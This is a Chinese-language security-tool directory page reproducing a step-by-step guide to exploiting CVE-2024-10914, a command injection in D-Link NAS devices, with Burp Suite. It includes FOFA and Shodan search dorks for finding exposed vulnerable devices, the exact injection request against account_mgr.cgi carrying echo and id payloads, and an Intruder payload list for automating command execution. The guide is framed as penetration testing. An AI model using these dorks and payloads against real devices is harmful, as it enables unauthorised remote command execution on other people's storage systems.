Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/egi08/cve-2024-10914
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试命令与控制
GitHubegi08/cve-2024-10914

CVE-2024-10914

CVE-2024-10914_使用burpsuite进行手动测试

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-10914 D-Link NAS 命令注入漏洞测试 — 使用 Burp Suite 手动测试


查找易受攻击设备的 Dork

使用以下搜索 Dork 查找可能易受攻击的 D-Link NAS 设备:

root@kitploit:~

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd"

此搜索字符串有助于识别运行受影响版本 Lighttpd 服务器的易受攻击 D-Link DNS ShareCenter 设备。


本指南提供了如何使用 Burp Suite 手动测试 D-Link NAS 中 name 参数的命令注入漏洞(CVE-2024-10914)的逐步说明。目标 URL:http://Target。

前提条件

  • Burp Suite
  • 一个已配置为使用 Burp Suite 作为代理(通常设置为 127.0.0.1:8080)的 Web 浏览器

第 1 步:设置 Burp Suite

  1. 启动 Burp Suite:在你的机器上启动 Burp Suite。
  2. 配置代理:确保你的浏览器已配置为使用 Burp Suite 作为代理,将浏览器的代理设置设为 127.0.0.1,端口 8080。

第 2 步:拦截请求

  1. 导航到目标:在浏览器中访问 http://Target。
  2. 启用拦截:在 Burp Suite 中启用拦截功能,以捕获发出的请求。

第 3 步:修改请求

  1. 定位易受攻击的参数:在拦截到的请求中,找到 URL 中的 name 参数。它应该如下所示:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
    
  2. 注入测试命令:将 name 参数修改为包含测试命令,例如 echo "test":

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
    
  3. 发送修改后的请求:将修改后的请求转发到服务器。


第 4 步:分析响应

  1. 检查响应:在响应中查找注入命令的输出。例如,如果服务器执行了 echo "test",你应该看到:

    root@kitploit:~
    test
    

第 5 步:利用漏洞

  1. 注入恶意命令:如果测试成功,尝试更复杂的命令,例如:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
    
  2. 发送利用请求:将此请求转发到服务器。

  3. 分析响应:检查响应中是否存在命令的输出(例如用户 ID 信息)。


第 6 步:使用 Burp Suite 扩展自动化(可选)

  1. 使用 Intruder:使用 Burp Suite 的 Intruder 工具自动化测试。

    • 右键单击请求并选择 发送到 Intruder。
    • 将 name 参数设置为 Payload 位置。
    • 使用一系列命令作为 Payload 进行测试。
  2. 示例 Payload:

    root@kitploit:~
    echo "test"
    id
    uname -a
    ls /etc
    
  3. 启动 Intruder:运行 Intruder 攻击以自动测试多个 Payload。


下载工具